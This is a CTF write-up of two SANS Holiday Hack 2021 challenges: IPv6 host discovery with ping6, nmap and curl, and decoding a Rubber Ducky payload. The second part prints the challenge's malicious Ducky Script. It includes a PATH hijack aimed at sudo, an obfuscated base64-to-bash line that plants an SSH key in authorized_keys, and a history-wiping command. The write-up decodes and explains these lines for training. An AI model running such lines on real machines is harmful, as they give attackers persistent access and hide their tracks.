Holiday Hack 2021: Strange USB Device

Terminal - IPv6 Sandbox
Just off the Santavator on the Talks floor at KringleCon I’ll find Jewel Loggins with a Pi terminal:

Well hello! I’m Jewel Loggins.
I have to say though, I’m a bit distressed.
The con next door? Oh sure, I’m concerned about that too, but I was talking about the issues I’m having with IPv6.
I mean, I know it’s an old protocol now, but I’ve just never checked it out.
So now I’m trying to do simple things like Nmap and cURL using IPv6, and I can’t quite get them working!
Would you mind taking a look for me on this terminal?
I think there’s a Github Gist that covers tool usage with IPv6 targets.
The tricky parts are knowing when to use
around IPv6 addresses and where to specify the source interface.I’ve got a deal for you. If you show me how to solve this terminal, I’ll provide you with some nice tips about a topic I’ve been researching a lot lately – Ducky Scripts! They can be really interesting and fun!
He also unlocks a hint in my badge:
- Check out this Github Gist with common tools used in an IPv6 context.
The challenge is to find the host in the network that is hosting the password:
* netcat
* nmap
* ping / ping6
* curl
Welcome, Kringlecon attendee! The candy striper is running as a service on
this terminal, but I can't remember the password. Like a sticky note under the
keyboard, I put the password on another machine in this network. Problem is: I
don't have the IP address of that other host.
Please do what you can to help me out. Find the other machine, retrieve the
password, and enter it into the Candy Striper in the pane above. I know you
can get it running again!
Given the terminal name and the tools identified, it seems clear I need to find the host using IPv6.
I’ll start with an IPv6 ping
to the network broadcast address:
elf@14a2a210f8d8:~$ ping6 ff02::1 -c2
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:4cff:fe7b:61fe%eth0: icmp_seq=1 ttl=64 time=0.066 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.081 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=2 ttl=64 time=0.046 ms
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 22ms
rtt min/avg/max/mdev = 0.035/0.057/0.081/0.017 ms
I’ll try to scaneach of those with nmap
(using the -6
flag and with the interface specified by %eth0
), and two have open ports:
elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a003%eth0
Starting Nmap 7.70 ( ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:c0ff:fea8:a003
Host is up (0.000080s latency).
All 1000 scanned ports on fe80::42:c0ff:fea8:a003 are closed
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:4cff:fe7b:61fe%eth0
Starting Nmap 7.70 ( ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:4cff:fe7b:61fe
Host is up (0.00011s latency).
Not shown: 998 closed ports
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a002%eth0
Starting Nmap 7.70 ( ) at 2022-01-06 18:40 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000092s latency).
Not shown: 998 closed ports
80/tcp open http
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
The first one seems to be the terminal emulator itself:
elf@be5d924ce4f3:~$ curl http://[fe80::42:4cff:fe7b:61fe]:3000/ --interface eth0
<!doctype html>
<html lang="en">
<meta charset="utf8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="icon" type="image/x-icon" href="/favicon.ico">
<title>WeTTy - The Web Terminal Emulator</title>
<link rel="stylesheet" href="/assets/css/styles.css" />
<link rel="stylesheet" href="/assets/css/options.css" />
<link rel="stylesheet" href="/assets/css/overlay.css" />
<link rel="stylesheet" href="/assets/css/terminal.css" />
<div id="overlay">
<div class="error">
<div id="msg"></div>
<input type="button" onclick="location.reload();" value="reconnect" />
<div id="terminal"></div>
<script type="module" src="/client/wetty.js"></script>
<script src="/client/shared/conduit.js"></script>
The other one confirms I’m in the right place:
elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]/ --interface eth0
<head><title>Candy Striper v6</title></head>
<marquee>Connect to the other open TCP port to get the striper's activation phrase!</marquee>
Hitting it on port 9000 returns the password:
elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]:9000/ --interface eth0
Entering that solves the terminal.
Slot Machine Investigation
Happy to see the Candy Striper working again, Jewel provides hints:
Great work! It seems simpler now that I’ve seen it once. Thanks for showing me!
Prof. Petabyte warned us about random USB devices. They might be malicious keystroke injectors!
A troll could program a keystroke injector to deliver malicious keystrokes when it is plugged in.
Ducky Script is a language used to specify those keystrokes.
What commands would a troll try to run on our workstations?
I heard that SSH keys can be used as backdoors. Maybe that’s useful?
He also unlocks four hints in the badge:
- Ducky Script is the language for the USB Rubber Ducky
- Attackers can encode Ducky Script using a duck encoder for delivery as
. - It’s also possible the reverse engineer encoded Ducky Script using Mallard.
- The MITRE ATT&CK™ tactic T1098.004 describes SSH persistence techniques through authorized keys files.
Morcel Nougat and the Strange USB Device are in the Speaker _Un_Preparedness room at the end of the talks hall:

Hello and welcome to the speaker _Un_Preparedness Room!
I’m Morcel Nougat, elf extraordinaire.
I’ve heard the talks at the other con across the way are a bit… off.
I’ve heard the talks at the other con across the way are a bit… off.
I really don’t think they have the right sense about what makes for a wonderful holiday season. But, anyway!
Say, do you know anything about USB Rubber Duckies?
I’ve been playing around with them a bit myself.
Please see what you can do to help solve the Rubber Ducky Objective!
Oh, and if you need help, I hear Jewel Loggins, on this floor outside this room, has some experience.
The terminal gives the details of what to do:
A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in /mnt/USBDEVICE.A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in /mnt/USBDEVICE.
Get Ducky Script
In the home directory, there’s a single script,
elf@bc26d16160e2:~$ ls*
This was mentioned in the hints as a way to decode RubberDucky’s command language.
A Rubber Ducky is a USB device designed to execute simple scripts to inject keystrokes and mouse clicks into a machine when it is inserted.
there’s a single inject.bin
elf@bc26d16160e2:/mnt/USBDEVICE$ ls
seems to take a -f [file]
elf@bc26d16160e2:~$ python3
usage: [-h] [--file FILE] [--no_analyze] [--output_file OUTPUT_FILE]
[--analysis_file ANALYSIS_FILE] [--debug]
optional arguments:
-h, --help show this help message and exit
--file FILE, -f FILE The file to decode, default: inject.bin
--no_analyze, -A Include this switch to turn off analysis of the duckyfile
--output_file OUTPUT_FILE, -o OUTPUT_FILE
File to save decoded ducky script to. Default will print duckyfile to
--analysis_file ANALYSIS_FILE
Location to output analysis. Default will print analysis to screen.
--debug Enable Debug Logging.
Running it with that prints out the ducky-script:
elf@bc26d16160e2:~$ python3 -f /mnt/USBDEVICE/inject.bin
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
STRING history -c && rm .bash_history && exit
Analyze Duck Script
I’ll look at the full Ducky Script in this video:
To find the flag, at the end of the script, there’s these lines:
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
It’s sending that string into rev
then base64 -d
then bash
. In my own terminal, I’ll decode that:
elf@bc26d16160e2:~$ echo "==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ" | rev | base64 -d
echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK' >> ~/.ssh/authorized_keys
This is writing an SSH key for ickymcgoop into the authorized_keys
file for elf, providing persistent access.
Flag: ickymcgoop